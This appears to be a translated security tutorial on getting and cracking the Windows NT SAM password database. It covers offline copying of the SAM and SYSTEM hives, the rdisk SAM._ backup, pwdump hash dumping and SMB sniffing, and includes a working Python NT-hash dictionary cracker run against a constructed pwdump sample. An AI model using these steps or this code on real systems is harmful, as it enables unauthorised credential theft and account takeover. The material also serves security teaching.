Typically, an attacker's assault on NT takes one of the following forms:
1. Password guessing (manual guessing, automated guessing, sniffing-assisted guessing);
2. Remote exploits (buffer overflows, denial of service / DDoS);
3. Privilege escalation (harvesting information, modifying the registry, GetAdmin, Sechole, Trojan horses);
4. Cracking the SAM file (obtaining the SAM, then running cracking software against it);
5. Exploiting trust relationships (changing registry key values);
6. Remote control and monitoring (NetCat listeners, BO2000, WinVNC).
Here I would like to talk about the SAM file. There are generally four ways to get hold of it:
1. Boot another operating system
As the name implies, if the server is not booted into NT but into a different operating system, the SAM file obviously loses its protection, because NTFS permissions are only enforced by a running NT kernel. Attackers commonly use NTFSDOS from Systems Internals, which reads NTFS volumes from a DOS boot disk with no regard for NTFS permissions, and simply copy the SAM file out of %systemroot%\system32\config. On a system where SYSKEY is enabled, the SYSTEM hive from the same directory is needed as well, since it holds the key with which the stored hashes are additionally encrypted.
2. Obtain the backup copy of the SAM
NT's Repair Disk Utility (rdisk) backs up critical system information, which of course includes the SAM: rdisk /s writes a compressed copy of the SAM to the %systemroot%\repair directory under the name SAM._. Most administrators, after copying this information to the repair floppy, forget to delete these files, leaving them behind for an attacker to use. The attacker generally decompresses SAM._ (expand.exe handles this format) and imports the result into L0phtcrack to finish the job.
3. Dump the password hashes from the SAM
We covered earlier how to obtain Administrator access. With administrator privileges an attacker can easily read the NT password hashes stored in the SAM portion of the registry; the L0phtcrack and pwdump tools mentioned before dump them straightforwardly. After NT has been patched this gets harder, though: SYSKEY (shipped with Service Pack 3) adds a second layer of encryption over the stored hashes, so the plain registry read that the original pwdump performs no longer yields usable hashes, and a tool that extracts them from the running system, such as pwdump2, is needed instead.
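The hashes that pwdump writes out and that L0phtcrack consumes are unsalted, which is what makes the dictionary attack cheap: every candidate word is hashed once and compared against every account at the same time. The following Python is an added example, not code from the original article nor from L0phtcrack or pwdump. It implements the NT hash (MD4 over the UTF-16LE encoding of the password, per RFC 1320, written out in pure Python because hashlib on OpenSSL 3 builds often has MD4 disabled), parses a constructed dump in the pwdump text format (user:RID:LM hash:NT hash:::), and runs a small wordlist against it. The sample dump and wordlist are constructed for the example; the LM column is only parsed and flagged, not computed.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z): return (x & y) | (~x & z)
def _g(x, y, z): return (x & y) | (x & z) | (y & z)
def _h(x, y, z): return x ^ y ^ z


# (function, additive constant, message-word order, shift cycle) per RFC 1320 round
_ROUNDS = (
    (_f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
    (_g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
    (_h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). NT stores MD4(UTF-16LE(password)) with no salt."""
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as little-endian u64
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for func, const, order, shifts in _ROUNDS:
            for i in range(16):
                # Step i rotates the (a, b, c, d) roles: (a,b,c,d), (d,a,b,c), (c,d,a,b), ...
                ia, ib, ic, id_ = ((j - i) % 4 for j in range(4))
                val = (s[ia] + func(s[ib], s[ic], s[id_]) + x[order[i]] + const) & MASK32
                s[ia] = _rotl(val, shifts[i % 4])
        state = [(a + b) & MASK32 for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """Hex NT hash as pwdump prints it (lower-case)."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password (no LM hash stored)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password


def parse_pwdump(text: str) -> list:
    """Parse pwdump-style lines (user:RID:LM hash:NT hash:::) into dicts."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        lm, nt = parts[2].lower(), parts[3].lower()
        accounts.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
                         "lm_present": lm != EMPTY_LM})
    return accounts


def crack_nt(accounts: list, wordlist: list) -> dict:
    """Dictionary attack: hash each candidate once, look every account up in the table."""
    table = {}
    for word in [""] + list(wordlist):  # always try the empty password first
        table.setdefault(nt_hash(word), word)
    return {acct["user"]: table.get(acct["nt"]) for acct in accounts}


# Constructed sample dump; Administrator's hashes are those of "password", Guest's are empty.
SAMPLE_DUMP = """\
# user:RID:LM hash:NT hash:::
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
WORDLIST = ["admin", "letmein", "Password", "password", "secret"]  # constructed

if __name__ == "__main__":
    accounts = parse_pwdump(SAMPLE_DUMP)
    for user, pw in crack_nt(accounts, WORDLIST).items():
        print(f"{user}: {pw!r}" if pw is not None else f"{user}: not in wordlist")
```

Because the NT hash is unsalted, the cost of the attack is one MD4 per candidate regardless of how many accounts are in the dump, which is exactly why a leaked SAM._ or pwdump output is so valuable to an attacker.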
4. Sniff the NT password authentication exchange
Here L0phtcrack has to be mentioned again; arguably its most powerful feature is that it can sniff the SMB (Server Message Block) authentication exchange straight off the local network. Strictly speaking, what it captures is not the stored hash itself but the server's challenge and the client's LM/NTLM response computed from that hash; L0phtcrack then cracks those, so the attacker needs no account on the server at all, only a position on the same network segment.